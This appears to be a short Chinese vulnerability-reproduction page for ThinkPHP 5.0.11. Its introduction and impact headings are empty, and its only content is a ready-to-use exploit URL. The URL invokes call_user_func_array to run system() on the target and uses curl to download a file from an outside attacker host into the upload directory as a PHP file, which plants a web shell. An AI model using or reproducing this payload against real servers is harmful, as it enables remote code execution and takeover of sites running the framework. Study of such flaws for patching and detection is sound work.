跳转至

Thinkphp 5.0.11

一、漏洞简介

二、漏洞影响

三、复现过程

http://url/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=curl https://www.hack.com/xxx.js -o ./upload/xxx.php